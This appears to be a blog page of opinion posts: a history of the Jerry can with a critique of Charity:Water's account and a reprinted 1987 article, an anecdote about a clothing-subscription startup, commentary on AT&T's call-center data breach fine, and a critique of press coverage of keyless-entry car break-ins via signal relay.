Skip to content


The story behind the Jerry can

You may have heard a story about the Jerry can. Perhaps it goes something like Hitler was such a brilliant strategist that in 1936 he personally called forth an engineer to create a nearly perfect fuel can, which we still use to this day.

As a student of history I find this story nearly impossible to accept, not to mention as a humanist I find it a load of apologist nonsense about a genocidal maniac.

Why 1936, to begin with? Why did other countries take so long to follow? And how could Hitler’s grand supply-chain foresight three years before mobilizing for war with Poland fit into the many infamous Nazi fuel planning disasters that crippled the overall war effort?

No, Hitler wasn’t good at planning. No, Hitler wasn’t good at listening and adapting.

A more plausible story is that someone, probably a German soldier or mercenary assisting with Italian and Spanish fascist war campaigns in 1936, simply grew fed up with gas cans at a micro level. A WWI generation of fuel cans sucked for many reasons (couldn’t be stacked, leaked, couldn’t pour without a mess, couldn’t be carried in bulk).

I believe the archives should show this: from the summer to the fall of 1936, or maybe even earlier, German war management listened to field agents and decided something better was needed. Just like when the Nazis thought about putting radios in tanks for the first time, a decisive advantage in 1940, they also thought about motorized vehicle fuel supply.

It’s very likely some German soldier hated the inefficiency of the prior cans and borrowed or collaborated with Italian and Spanish fascists to find a better one. I see no evidence this can was meant to be a macro strategy for fuel supply management and plenty of evidence that Nazi fuel supply management overall was a disaster. The fact that a better can later was instrumental in battle outcomes was a reflection of grounded principles, not strategic thought.

And so an engineer won a Nazi contract to design a better can on some rather obvious theory of improving durability and portability to increase availability of fuel. Quality of engineering and manufacturing still was high in Germany at that time, despite emigrations and arrests of talent; so the Jerry can was born from a pressed metal factory preparing the Nazi war machine.

Some suggest the can was a military secret. Of course 1936 was full of secrecy to help with propaganda hiding the re-militarization. Hitler was a pathological liar who ran misinformation campaigns, playing a victim card over and over again, making technology secrecy essential. This was a factor.

Even more of a factor was a reluctance of Allies to listen to their field and incorporate feedback. Sending Sherman tanks into battle was an abject lesson in fail-faster because high casualties. Wasted fuel was harder to quantify. Unlike the Japanese however the Americans did adjust if they could see the need or advantage.

It turns out the Jerry can was discovered in 1939 by an American, even before hostilities, due to use at the Berlin airport (a German stole three and shared the technology). The delay in adoption by the Allies is related to their blindness to its value.

It took another four years because leadership of the Allies relied on statistical analysis and probably needed reports formatted with quantitative methods to make a change.

In 1942 an Allied soldier-chemist working on fuel logistics in northern Africa (e.g. facing similar things that soldiers in the Italian campaign of 1936 might have seen) converted qualitative field reports (e.g. old cans suck) into a statistics-based cable to Washington (e.g. we’re losing 40% of fuel before it even gets to the vehicle).

The lesson here is listening to qualitative field reports can inspire innovation in design, and quantitative analysis can show how small and simple changes in efficiency can make a major difference.

I am all ears if someone can find a memo from Hitler calling for a better fuel can and reasons to stockpile. My guess is the design came far more organically from soldiers with a best guess on stocks from field observations during Spanish, Italian and Japanese fascist aggression, rather than any master plan.


The Story behind the yellow Jerry can used as a logo for Charity:Water

Once upon a time I sailed across the Pacific with the typical yellow fuel can lashed to the deck.

Although yellow cans have specific meaning to me, which I thought was a standard because it is a safety issue, recently I found a charity worker flashing smiling children at me next to yellow cans of water.

I was told yellow Jerry cans for water is something seen “everywhere”.

You’ve seen it everywhere on our site, at our events, on our shirts… tattooed on our arms… and although the Jerry can has become a mainstay for our staff and supporters, we want to let you know what it actually is and why it’s a symbol of the charity: water mission.

Yellow fuel can. I had to disagree. It always has indicated danger to me; sickening fuel slick and fumes. Red cans, yellow cans. DO NOT DRINK. Regardless of continent or sea, I knew globally not to use the yellow cans when thirsty.

Confused by people asking for charity money? Me too.

I searched for why someone juxtaposed fuel cans with smiling happy children drinking clean water. Yellow cans seemed anything but appropriate for a “clean” anything. What is next, oil barrels?

So with that in mind I started reading and found some surprises on the charity website. Soon I became more concerned, not less.

You might say my opinion worsened as I read through a very strange and apologetic tone about “the German military” and their WWII leader:

Charity:Water Example one

To most people, this simple metal or plastic can means ‘gasoline,’ and rightfully so — the first Jerry cans were introduced as gasoline containers by the German military at the start of World War II.

False.

Jerry cans existed during the Spanish Civil War of 1936, years prior to the start of WWII. These cans served both as fuel and water containers, which we know because they were stamped with clear markings for their purpose.

Germany was involved with and supported other fascist militarism. Someone within the growing Nazi war machine was looking at how to improve a fuel can long before Hitler mobilized troops on 15 March 1938 (passive capitulation of Czechoslovakia) or 1 September 1939 (1.5 million marched into Poland, conquering 140 miles in just one week).

I believe the real story goes to lessons in vehicle support and supply containers (e.g. evaporation/expansion) derived from Italian invasion (3 October 1935) of Ethiopia and there is evidence it the cans were modified or tested in the Spanish Civil War (17 July 1936).

Handling chemicals in extreme conditions had forced Italy and Spain to evolve their technology. For example the Italians had developed new mustard gas and new cannisters to drop on the Ethiopian hospitals flying the red cross (infamously killing Swedish medical leaders Fride Hylander and Gunnar Lundström).

The day called “darkest in the history of the International Red Cross” is worth reading if you want to get a sense of expanding conflict leading to a quickening pace of technology change in 1936.

Does the can mean gasoline? A phrase like “to most people” indicates some kind of data or source to check, yet none is provided.

I would say most people associate the Jerry can with a variety of fuels, not simply gasoline, and maybe even water. My data is based on search engine results (e.g. “Jerry Cans – Fuel, Water, Diesel, & Accessories” or “can be used for fuel and drinking water”)

We know 1930s Germany used gasoline for vehicles and yet their fuel cans were stamped with a generic word, Kraftstoff (fuel) instead. Perhaps today with yellow cans we are following in the design of the original Jerry can designers, who used unique symbols to differentiate the different fuels and water.

So to most people I think it fair to say the Jerry can means various liquids, not simply gasoline, and most people expect consistent symbols and use to avoid mixing them.

Charity:Water Example two

These five-gallon cans, also called ‘Jeep cans’ or ‘blitz cans’ (or, in Germany, ‘Wehrmachtskanisters’) were made of steel and usually sat in the back of vehicles as a reserve tank of gas.

Misleading.

Usually cans were strapped on the side of Nazi vehicles (and the sides of Allied vehicles as well, later) because this allowed less durable/convenient material to use the more controlled back space. Lashing the cans to the sides left your cargo space available and also avoided a mess. We did the same on our boat when we crossed the ocean. Reserve cans were balanced on either side, not in the back.

The cans are 20L capacity (about 5.28 US gallons or 4.40 UK gallons).

The cans were steel yet what is more notable is how they incorporated a synthetic lining.

Also given that Jerry cans weren’t used by Jeeps until many years later I am not sure why Jeep cans is mentioned here. It strangely brands the can with a trademark of a specific American vehicle despite the cans not being developed for it originally and being used much more widely.

Blitz also is odd to mention. It means lightning in German and refers to a military campaign tactic of the Nazis. Although a German war reference could make sense at first glance, today it calls into question a can with a trademark and significant engineering difference.

Originally in the 1940s a US company that made Jerry cans used the word “metal” in their name. They grew so large the vast majority of American fuel cans were made at this “metal” company. By the 1990s they had switched to making plastic cans. Their “metal” name was deprecated and replaced with a fuel can word associated with Nazis because, well, Oklahoma.

After changing its name to “Blitz” and changing production from metal to plastic the venerable American Jerry can manufacturer filed Chapter 11 during dozens of lawsuits over defective/explosive cans.

Charity:Water Example three

It’s said that Adolph Hitler anticipated the biggest challenge to taking over Europe in WWII was fuel supply. So Germany stocked up.

False and super annoying.

Look, this is very wrong for many reasons. I don’t expect to read charitable thoughts on Hitler from a supposed “charity” site. WTF. No really, WTF.

Also I find “it’s said” to be an unacceptable start to a pro-Hitler sentence that lacks any citation. Who said Hitler anticipated…what? Hitler was an insane dictator and deserves no glorifications. I should not need to cover this.

Nonetheless, it is easy to see how badly that fascist leader sucked at planning. The USAF points out he took his country to war with an acute fuel shortage and massive dependence on imports:

At the outbreak of the war, Germany’s stockpiles of fuel consisted of a total of 15 million barrels.

That is basically nothing, given their rate of consumption, and fuel was expected to run out by 1941. Fuel cans were not going to solve that challenge.

A Nazi official was surely eager to solve a part, an aspect of a fuel distribution problem, with a Jerry can. A pile or distribution of cans does not equate to solving massive supply issues, even if I accept it was the “biggest challenge”.

I mean of course fuel did not pose the “biggest challenge” to taking over Europe.

This claim is so absurd I don’t even know where to begin. Put it in reverse perspective: having solved the supply of fuel alone would not have won the war for the Axis. It was not the single deciding factor. It was a factor among many, with the other factors often being far more difficult.

A Hitler “anticipation” theory does not fit with Operation Barbarossa. Consider that more than 600,000 Nazi horses were relied upon in 1941 as fuel was running out, with a lack of standardization, split and confused leadership and overly-optomistic ideas of a quick victory that undermined logistics and supply-chain efforts.

The simple fact is from June to December 1941 the result was “half-starved and half-frozen; out of fuel and ammunition.” It was the opposite of anticipation and stocking up early.

Charity:Water Example four

As Germany moved through Europe and North Africa, so did their thousands of gasoline cans. These cans proved to be dependable and durable; soon, countries all over the world were adapting them to haul and store liquids, coining them ‘Jerry cans’ because of their German origin (‘Jerry’ was a snide name for a German WWII soldier). New water container designs emerged but nothing could top the strength and simplicity of the original rectangular, X-marked Jerry can.

False.

Obviously there were more than thousands of cans. The discovery of the Jerry can did not lead directly to adoption by the Allies. I sense some odd reverence for Nazis, even to the point of trying to apologize for “snide” names.

“Jerry” was actually a term used by Allies during WWI supposedly because the German helmet resembled a British jerry (chamber pot).

Snide? Is this a concern without context? War against fascism, let alone against genocide, perhaps invites derision?

As far as “new water container” designs I must again point out the original Jerry can also was used for water, with a designated stamp on the can to differentiate from fuel cans.

Jerry can design innovations

Jerry cans improved greatly upon prior cans, yet are quite simple in retrospect — better durability and portability. This can be explained with a couple short stories from the Allied perspective.

Durability

Paul Pleiss was an American engineer in Berlin who had used the new cannister (see Appendix A below) and realized its benefits. From the summer of 1939 to the summer of 1940 he found it very difficult to make a case (pun not intended) to the US military. America was reluctant to improve container design until they were forced to study and realize shortcomings in their North Africa campaign.

Things really turned around in 1942 after field qualitative reports backed by quantitative evidence said nearly half of fuel in Egypt was lost due to can failure. Depsite sizable effects recorded in desert battle outcomes in prior years (Wavell 1940, Auchinleck 1941, Montgomery 1942) for the US it was measured data that really hit home.

“…we sent a cable to naval officials in Washington stating that 40 percent of all the gasoline sent to Egypt was being lost through spillage and evaporation. We added that a detailed report would follow. The 40 percent figure was actually a guess intended to provoke alarm, but it worked. A cable came back immediately requesting confirmation.”

Six years after Italy’s campaign in Ethiopia influenced German thinking on cans, the US reached the same conclusions in North Africa.

Portability

The British appear to have ignored can design as Germany was innovating. At the start of WWII hostilities in 1939 UK still issued a “flimsy” can. The better Jerry can design only came to light for them in 1940 as French General Gamelin troops withered, leaving Britain alone to fight the Germans. An over-extended and fragile but fast German blitzkreig (lightning war) forced British study and realization; fuel portability could create a “Blitz” performance.

For example a can with a single handle is inferior to multiple handles when considering a line of soldiers trying to “bucket brigade”. Side handles meant two people could grab a can at the same time, or a single person could grab two with one hand. Faster can opening times mattered, as did less spillage during fuel transfer.

Put these British and American realizations together and you get what I believe to have been the context in November 1936 when Vinzenz Grünvogel of Müller applied for a German “Wehrmachtskanister” contract. An Italian campaign in Africa sparked the need for improvement, which then was tested in Spain. And speaking of context it seems also to be worth mentioning that there was prior “pressed material” collaboration between Müller and Ambi-Budd Presswerk. The Jerry can pressed design was a derivative more than a novelty.

With Italian tanks crossing Ethiopian territory in mind, here were the specifications:

Portability

  • 465mm tall
  • 340mm wide
  • 20L capacity
  • 4kg dry weight
  • easy to stack
  • easy to manufacture (two plates pressed)
  • easy to carry (one soldier = two full, four empty) +
    (two soldiers = three for bucket brigade speed of transfer)

Durability

  • shock (recessed welds)
  • corrosion (synthetic lining)
  • float (air pocket “bump”)
  • pour (short spout)
  • seal (cam with lock)
  • expand (50deg max)

From the list it should be easy to see why the design has lasted. Ultimately these cans were manufactured by dozens of Axis companies (Müller, Presswerke, Metalwerk, Nowack, Fischer, Schwelm, etc) let alone by companies of the Allies after 1942.

Symbols and markings

Now take a minute to go back to the idea of contents. As I mentioned the Germans stamped cans with “Wasser” (water) or “Kraftstoff” (fuel). Despite a stamping process there also can be found a white W (Winterkraftstoff) on cans sent into the German campaigns. This reinforces that signage was evolving and a critical component. It also points again to a lack of overall planning and preparation mentioned above (Hitler apparently refused to believe war would last into winter).

And that brings me back to the yellow cans of today. How should cans with different contents safely be identified? Is there a standard? The answer is yes and no. Standards tend to evolve although generally they would go something like this.

Traditional

  1. Gasoline – Red
  2. Diesel – Yellow
  3. Drinking water (potable) – White
  4. Alt Fuels (Kerosene, JP Jet Fuel, Heli, M1 Meth, etc) – Blue
  5. Non-potable water – Green

Modern (e.g. 2005 California):

  1. Gasoline – red;
  2. Diesel – yellow; and
  3. Kerosene – blue

As far as I can tell Charity:Water uses yellow cans because convenience, not safety or health. They give no good explanation other than people in need already use diesel cans for water.

And that makes about as much sense as saying people in need already drink contaminated water so keep doing it.

It is not that I am opposed to redefining the colors. Here is a clever new version of white Jerry can contents.

My concern is the illogical position of pushing a global campaign to indicate clean water with the image taken from an Axis design and a global standard for dangerous/toxic liquid.

Starting from instinct it seems counter-productive to a charity objective. Moving on to deeper analysis a weak grasp of history suggests this may be a group divorced from reality/facts on the ground.

More on that…another day.


Appendix A

The Little Can That Could by Richard M. Daniel

Invention and Technology, Fall 1987, pp 60-64

During World War II the United States exported more tons of petroleum products than of all other war matériel combined. The mainstay of the enormous oil and gasoline transportation network that fed the war was the oceangoing tanker, supplemented on land by pipelines, railroad tank cars, and trucks. But for combat vehicles on the move, another link was crucial—smaller containers that could be carried and poured by hand and moved around a battle zone by trucks.

Hitler knew this. He perceived early on that the weakest link in his plans for blitzkrieg using his panzer divisions was fuel supply. He ordered his staff to design a fuel container that would minimize gasoline losses under combat conditions. As a result the German army had thousands of jerrycans, as they came to be called, stored and ready when hostilities began in 1939.

The jerrycan had been developed under the strictest secrecy, and its unique features were many. It was flat-sided and rectangular in shape, consisting of two halves welded together as in a typical automobile gasoline tank. It had three handles, enabling one man to carry two cans and pass one to another man in bucket-brigade fashion. Its capacity was approximately five U.S. gallons; its weight filled, forty-five pounds. Thanks to an air chamber at the top, it would float on water if dropped overboard or from a plane. Its short spout was secured with a snap closure that could be propped open for pouring, making unnecessary any funnel or opener. A gasket made the mouth leakproof. An air-breathing tube from the spout to the air space kept the pouring smooth. And most important, the can’s inside was lined with an impervious plastic material developed for the insides of steel beer barrels. This enabled the jerrycan to be used alternately for gasoline and water.

Early in the summer of 1939, this secret weapon began a roundabout odyssey into American hands. An American engineer named Paul Pleiss, finishing up a manufacturing job in Berlin, persuaded a German colleague to join him on a vacation trip overland to India. The two bought an automobile chassis and built a body for it. As they prepared to leave on their journey, they realized that they had no provision for emergency water. The German engineer knew of and had access to thousands of jerrycans stored at Tempelhof Airport. He simply took three and mounted them on the underside of the car.

The two drove across eleven national borders without incident and were halfway across India when Field Marshal Goering sent a plane to take the German engineer back home. Before departing, the engineer compounded his treason by giving Pleiss complete specifications for the jerrycan’s manufacture. Pleiss continued on alone to Calcutta. Then he put the car in storage and returned to Philadelphia.

Back in the United States, Pleiss told military officials about the container, but without a sample can he could stir no interest, even though the war was now well under way. The risk involved in having the cans removed from the car and shipped from Calcutta seemed too great, so he eventually had the complete vehicle sent to him, via Turkey and the Cape of Good Hope. It arrived in New York in the summer of 1940 with the three jerrycans intact. Pleiss immediately sent one of the cans to Washington. The War Department looked at it but unwisely decided that an updated version of their World War I container would be good enough. That was a cylindrical ten-gallon can with two screw closures. It required a wrench and a funnel for pouring.

That one jerrycan in the Army’s possession was later sent to Camp Holabird, in Maryland. There it was poorly redesigned; the only features retained were the size, shape, and handles. The welded circumferential joint was replaced with rolled seams around the bottom and one side. Both a wrench and a funnel were required for its use. And it now had no lining. As any petroleum engineer knows, it is unsafe to store gasoline in a container with rolled seams. This ersatz can did not win wide acceptance.

The British first encountered the jerrycan during the German invasion of Norway, in 1940, and gave it its English name (the Germans were, of course, the “Jerries”). Later that year Pleiss was in London and was asked by British officers if he knew anything about the can’s design and manufacture. He ordered the second of his three jerrycans flown to London. Steps were taken to manufacture exact duplicates of it.

Two years later the United States was still oblivious of the can. Then, in September 1942, two quality-control officers posted to American refineries in the Mideast ran smack into the problems being created by ignoring the jerrycan. I was one of those two. Passing through Cairo two weeks before the start of the Battle of El Alamein, we learned that the British wanted no part of a planned U.S. Navy can; as far as they were concerned, the only container worth having was the Jerrycan, even though their only supply was those captured in battle. The British were bitter; two years after the invasion of Norway there was still no evidence that their government had done anything about the jerrycan.

My colleague and I learned quickly about the jerrycan’s advantages and the Allied can’s costly disadvantages, and we sent a cable to naval officals in Washington stating that 40 percent of all the gasoline sent to Egypt was being lost through spillage and evaporation. We added that a detailed report would follow. The 40 percent figure was actually a guess intended to provoke alarm, but it worked. A cable came back immediately requesting confirmation.

We then arranged a visit to several fuel-handling depots at the rear of Montgomery’s army and found there that conditions were indeed appalling. Fuel arrived by rail from the sea in fifty-five-gallon steel drums with rolled seams and friction-sealed metallic mouths. The drums were handled violently by local laborers. Many leaked. The next link in the chain was the infamous five-gallon “petrol tin.” This was a square can of tin plate that had been used for decades to supply lamp kerosene. It was hardly useful for gasoline. In the hot desert sun, it tended to swell up, burst at the seams, and leak. Since a funnel was needed for pouring, spillage was also a problem.

Allied soldiers in Africa knew that the only gasoline container worth having was German. Similar tins were carried on Liberator bombers in flight. They leaked out perhaps a third of the fuel they carried. Because of this, General Wavell’s defeat of the Italians in North Africa in 1940 had come to naught. His planes and combat vehicles had literally run out of gas. Likewise in 1941, General Auchinleck’s victory over Rommel had withered away. In 1942 General Montgomery saw to it that he had enough supplies, including gasoline, to whip Rommel in spite of terrific wastage. And he was helped by captured jerrycans.

The British historian Desmond Young later confirmed the great importance of oil cans in the early African part of the war. “No one who did not serve in the desert,” he wrote, “can realise to what extent the difference between complete and partial success rested on the simplest item of our equipment—and the worst. Whoever sent our troops into desert warfare with the [five-gallon] petrol tin has much to answer for. General Auchinleck estimates that this ‘flimsy and illconstructed container’ led to the loss of thirty per cent of petrol between base and consumer. … The overall loss was almost incalculable. To calculate the tanks destroyed, the number of men who were killed or went into captivity because of shortage of petrol at some crucial moment, the ships and merchant seamen lost in carrying it, would be quite impossible.”

After my colleague and I made our report, a new five-gallon container under consideration in Washington was canceled. Meanwhile the British were finally gearing up for mass production. Two million British jerrycans were sent to North Africa in early 1943, and by early 1944 they were being manufactured in the Middle East. Since the British had such a head start, the Allies agreed to let them produce all the cans needed for the invasion of Europe. Millions were ready by D-day. By V-E day some twenty-one million Allied jerrycans had been scattered all over Europe. President Roosevelt observed in November 1944, “Without these cans it would have been impossible for our armies to cut their way across France at a lightning pace which exceeded the German Blitz of 1940.”

In Washington little about the jerrycan appears in the official record. A military report says simply, “A sample of the jerry can was brought to the office of the Quartermaster General in the summer of 1940.”

Richard M. Daniel is a retired commander in the U.S. Naval Reserve and a chemical engineer.

Posted in Energy, History, Security.


Le Tote: Weather Prediction As Retail

So I’m walking down the street in SF today and someone steps out of a building in front of me. I’m always interested in what’s happening around me so naturally I ask if they work there. This person answers yes and says it’s a bunch of startups, including Le Tote.

“It’s like Netflix for clothes” I am told as a shopping bag is opened to reveal a box.

“We send you clothes we recommend you wear and…” I interrupt to finish the sentence “if you keep them you buy them! Am I right?” They nod yes and smile widely as if they were about to explain something hard and I saved a mountain of effort.

A pregnant moment arrives as I wait for even more congratulations; although I have really just described the age-old mail-order model as it currently exists. The irony of me predicting the end of a sentence, and pointing out a lack of innovation, is lost. They just seem relieved of the chore of explaining something aspiring to be innovative.

Maybe I shouldn’t attempt to find humor in analytics. I ask seriously if they have anything I should try.

“It’s only for women right now” I am told with a disapproving look.

I genuinely wonder out loud about their predictive algorithm: “Why do you assume already I do not want to wear women’s clothes? What if I am transgender? Would you still predict my fashion?”

I am looked at skeptically and offered no answers other than a soft and slow repeat of “if you want to wear women’s clothes…”.

Still curious and since this person is still standing there (presumably at the mercy of a service, a late driver) I press for more. “Nevermind gender fashion definitions, how does your prediction reflect regional differences. For example when someone in Colorado…” they interrupt me to say “we check the weather”.

Weather? Definitely not the end of sentence I had in mind.

I forgo jokes about the weather being perpetually wrong and instead restart my question so I can bring back my ending: “what do you do when someone in Colorado thinks sky-blue is the hot new color, while someone in SF wants orange and green? Can your algos anticipate fashion trends from social or other indicators, given your fashion angle”; tempted to add “not a good indicator of weather”.

Their face grows bright, they lean back, look to the street with an open gaze, suck in an ocean of air and exclaim “WOW WHAT A GREAT IDEA, I WILL SUGGEST THIS IDEA AT OUR NEXT MEETING”. Then they abruptly turn and excitedly run across the street waving a hand.

Now standing alone I yell “so what’s your name” towards the back of a head that nears an Uber parked in the bike lane. “Heather” is the response. Of course it is. And so I continue on my way.

Posted in Security.


Impostors in Your Call Center

As a PCI assessor I was often asked how to protect the personally identifiable information (PII) captured within audio recordings. Call centers, especially very large and distributes ones, tended to end up with giant archives of people talking about payment information. Also packet capture systems such as intrusion detection or network forensics tended to collect payment card data discussed (e.g. using IP phones).

The bottom line (pun not intended) was that working with audio security is an interesting challenge and can add some flavor to the usual job of masking, replacing or encrypting stored data.

And yet despite a body of knowledge in this area, leading to steady improvement in security tools to reduce fraud from audio data, we still see in the news major disasters. I believe this not to be any failure of technology but rather a higher-level management issue: like quality engineering can’t really be blamed on tools as much as attention to details.

Take for example AT&T just has been fined by the FCC $25m for three breaches

In May 2014, the Enforcement Bureau launched its investigation into a 168-day data breach that took place at an AT&T call center in Mexico between November 2013 and April 2014. During this period, three call center employees were paid by third parties to obtain customer information — specifically, names and at least the last four digits of customers’ Social Security numbers — that could then be used to submit online requests for cellular handset unlock codes. The three call center employees accessed more than 68,000 accounts without customer authorization, which they then provided to third parties who used that information to submit 290,803 handset unlock requests through AT&T’s online customer unlock request portal.

One attack would be a problem. Three impostors are a sign of something far more troubling; management is not detecting or preventing active infiltration designed to bypass internal controls and steal valuable data. Organized crime still shows success at either coercing staff or implanting attackers in call centers to leak PII for financial gain. And if three impostors aren’t bad enough, the FCC goes on to document another forty individuals found stealing PII.

Kudos to the FCC for their investigation and subsequent action. I believe it is right for them to emphasize a top-level management approach as a solution.

The people who were caught in the act of stealing (the impostors themselves) will likely go to jail (as was also found in the recent Bechtel executive fraud case). New oversight needs to be forced by regulators at top-levels of company management so they pay better attention to impostors and other attackers stealing PII.

…AT&T will be required to improve its privacy and data security practices by appointing a senior compliance manager who is a certified privacy professional, conducting a privacy risk assessment, implementing an information security program, preparing an appropriate compliance manual, and regularly training employees on the company’s privacy policies and the applicable privacy legal authorities. AT&T will file regular compliance reports with the FCC.

Posted in Security.


Keeping Car Contents Safe From Electronic Key Thieves

Nick Bilton is a columnist for the New York Times (NYT). He published a story today called “Keeping Your Car Safe From Electronic Thieves” and I adapted my blog post title from his.

Perhaps you can see why I changed the title slightly from his version. Here are a couple reasons:

First, his story is about things inside a car being at risk, rather than the car itself being unsafe. Second, and more to the point, the “electronic thieves” are not stealing cars as much as opening doors and grabbing what is inside.

That second point is a huge clue to this story. If thieves were “cloning” a car key, making a duplicate, then I suspect we would see different behavior. Perhaps penalties for stealing cars are enough disincentive to keep thieves happy with stealing contents. But I doubt that. More likely is that this is a study in opportunity.

You could read the full article, or I suggest instead you just read his tweets on April 6th for a more interesting version of what led to the story (meant to be read from bottom to top, as Twitter would have you do):

Nick Bilton @nickbilton · Apr 6
@ejacqui It looks like it’s a broadcasts a bunch of signals to open the car lock. They cost about $100, apparently.
5 retweets 3 favorites

Nick Bilton @nickbilton · Apr 6
@seanbonner @gregcohn @tonx @sacca Fast-forward 10 years and thieves (or pranksters) will be doing this with our homes.
2 retweets 4 favorites

Nick Bilton @nickbilton · Apr 6
@tweets_amanda I tried. I ran after them, but they took off. The cops said it’s easy to get online, whatever “it” is.
0 retweets 1 favorite

Nick Bilton @nickbilton · Apr 6
@r2r @StevenLevy No. A Toyota Prius. Crazy how insecure this “technology” is.
1 retweet 1 favorite

Nick Bilton @nickbilton · Apr 6
@kevin2kelly Yep. Exactly. No broken window, and to a passerby it looks like the thief is in their own car. Scary stuff.
1 retweet 3 favorites

Nick Bilton @nickbilton · Apr 6
@StevenLevy Yep. I chased after them, not to tell them off, but to ask what technology they were using. :-)
4 retweets 24 favorites

Nick Bilton @nickbilton · Apr 6
@noneck Was watching out the window and saw them do it. (I then ran out and yelled at them, and they took off.)
1 retweet 1 favorite

Nick Bilton @nickbilton · Apr 6
@sacca Just did a little research & it’s insane how easy it is to get the device they used. Scary when you think about the connected home.
22 retweets 24 favorites

Nick Bilton @nickbilton · Apr 6
@Beaker A Toyota Prius. It was like watching someone slice into butter. That simple.
1 retweet 5 favorites

Nick Bilton @nickbilton · Apr 6
@schlaf I chased them down and thought, what’s the point. They’re kids. I really wanted to just ask them about the technology! :-)
3 retweets 22 favorites

Nick Bilton @nickbilton · Apr 6
@owen_lystrup Toyota Prius. Don’t get one. Buy an old 1970s car with a key. :-)
3 retweets 10 favorites

Nick Bilton @nickbilton · Apr 6
@trammell Yep. Literally just pressed a button and opened the door. It was bizarre and scary when you think about the “connected home”.
12 retweets 22 favorites

Nick Bilton @nickbilton · Apr 6
@SubBeck Yelled at them and called the cops. The cops sounded blaze by the whole situation.
2 retweets 4 favorites

Nick Bilton @nickbilton · Apr 6
@cowperthwait Toyota Prius. It’s insane that they can literally press a button and open the door.
23 retweets 16 favorites

Nick Bilton @nickbilton · Apr 6
@MatthewKeysLive Nothing; it’s empty. They’ve done it before when I wasn’t around. But I had no idea how they were doing it. Now I know.
3 retweets 5 favorites

Nick Bilton @nickbilton · Apr 6
Just saw 2 kids walk up to my LOCKED car, press a button on a device which unlocked the car, and broke in. So much for our keyless future.

To me there are some fingernails-on-chalkboard annoying tweets in that stream. Horrible attribution, for starters (pun not intended). He says don’t get a Toyota Prius because it must be their fault. Similarly he says our keyless future is over and we should buy something from the 1970s with a key. And then he goes on to attack the idea of a connected home.

This is all complete nonsense.

The attribution is wrong. The advice is wrong. Most of all, the fear of the future is wrong.

Consider that thieves leave a car essentially unharmed (unlike all the smash and grab behavior linked to economic/political issues). This tells us a lot about risk, methods and fixes. It means for example that insurance companies are not likely to be motivated for change. After all, no windows broken and no panels scratched or damaged means no real claims.

In this reporter’s case he even says nothing valuable was in the car. There’s nothing really to tell the police other than someone opened the door and closed it again. A thief who walks up, opens the door, and takes whatever they can from inside the car…this is an encryption/privacy expert’s worst nightmare. This is a lock being silently bypassed with something that amounts to a dreaded escrow or golden key. Given the current encryption debate about backdoors we might have a very interesting story on our hands.

THIS COULD HAVE BEEN A VERY POWERFUL AND PERSONAL STORY OF BEING VIOLATED BY WEAK KEY MANAGEMENT – HOW OUR SOCIETY HAS BEEN LET DOWN BY PRODUCT MANUFACTURERS WHO DON’T CARE ENOUGH ABOUT PROTECTION OF OUR ASSETS. Sadly the NYT misses entirely the significance of their missing the point.

Mind you I tried on April 8th to contact the reporter and add some of this perspective, to indicate the story is really about risk economics and a much broader debate on key management.

biltondoorkey

Unlike the (dare I say shallow) angle taken by the NYT as something “newsworthy”, a car lock bypass is not new to anyone who pays attention to security or to the mundane reports of people getting their cars broken into. That Winnipeg story I offered the reporter to calm him down is years old. There also were reports in London, Los Angeles and other major city news over the past years describing the same exact scenario and how police and car manufacturers weren’t eager to discuss solutions. The NYT reporter is essentially now stumbling into the same rut.

2013 reports actually followed 2012 news of cars being stolen and disappearing. My guess is the organized crime tools filtered down to the hands of petty criminals and eventually mischievous kids. There is far wider opportunity as motives soften and means become easier. The organization and operation required to fence a stolen car probably shifted first to joy rides, then shifted again to people grabbing contents of cars and eventually to people just curious about weak controls. The shifts happened over years and then, finally, a NYT reporter felt it personally and was rustled awake.

Apparently the NYT did not pay attention to the alarming (pun not intended) trend other reporters have put in their headlines. I did a quick search and found no mention by them before now. It does seem a bit like when crime happens to a NYT reporter the NYT cares much more about the story and frames it as very newsworthy and novel, if you know what I mean.

To really put it in perspective, nearly twenty years ago a colleague of mine had set a personal goal to invisibly open car doors in under five seconds. This is a real thing. He was averaging around seven seconds. General lock picking has since become a more widely known sport with open and popular competitions.

Anyone saying “so much for our keyless future” after this kind of incident arguably has no clue about security in the present let alone the future. Expressing frustration on Twitter turned into expressing frustration at the NYT, which leaves the reader hanging for some real risk analysis.

So that is why I say the real story here, similar to a key escrow angle missed by the reporter, is economics of a fix. Why doesn’t he take a hard look at the incentives and real barriers to build better keyless electronic systems?

The NYT reporter gets so close to the flame and still doesn’t see the problem. For example he mentions that he dug up some researchers (e.g. Aurélien Francillon, Boris Danev and Srdjan Capkun) who had published their work in this area. Isn’t the obvious question then why a key and lock aren’t able yet to fend off an unauthorized signal boost after the problem was detailed in a 2011 paper (PDF): “Relay Attacks on Passive Keyless Entry and Start Systems in Modern Cars“?

pkes-bypass-repeater
“Figure 4. Simplified view of the attack relaying LF (130 KHz) signals over the air by upconversion and downconversion. The relay is realized in analog to limit processing time.”

Long story short thieves obviously have realized that keyless entry relies on a primitive communication channel, based on near proximity, between lock and key. The thieves may even have inside access to lock development companies and read technical manuals that revealed assumptions like “key must be within x feet for door to unlock”. Some people would stop at x feet but that statement is a huge hint to hackers that they should try to achieve greater ranges than meant to work.

The simple theory, the one that makes the most sense here, is that thieves are simply boosting the signal to extend the range of keyless entry signal.

First they pull a car door handle, which initiates a key request. Normally the key would be out of range but thieves boost the request much further away. The key could be in the owners pocket inside a restaurant, or a school, on a baseball field, at a park bench, or even in a home.

Second the key receives the door signal and sends its reply.

Third the thieves pull the door handle to open the car.

Simple no?

One might suppose the thieves could press a start button and drive away but then what happens when they shut the engine off many miles from the key? That’s a whole different level of thief as I mentioned above. Proximity means risk/complexity of an attack is lowest if they just invisibly open a door and take small-value items or nothing at all.

Again, insurance companies are not going to jump into this without damage to a car or the car isn’t stolen. Manufacturers likewise have little incentive to fix the issue if there is no damage. A more viable solution, thinking about the economics and market forces, would be to encourage car owners to buy an aftermarket upgrade based on standards.

Don’t like the stereo in your car? Put in a better one aftermarket. Don’t like the seats? Upgrade those too, with better seat belts and lumbar support. Upgrade the brakes, the suspension and even put in an alarm…now ask yourself if you can find a new set of quality electronic locks that blocks the latest attacks. Where is that market?

Isn’t it strange that you can not simply upgrade to a better electronic lock? It sounds weird, right? Where would you go to get a better key system for your car? The platform, the car itself, should allow you to upgrade to an electronic key. Add a simple on/off switch and this attack would be defeated. This would be like installing better locks and keys in your home (explaining why our homes are not at the same level of risk from this attack). Why can’t you do this for a car?

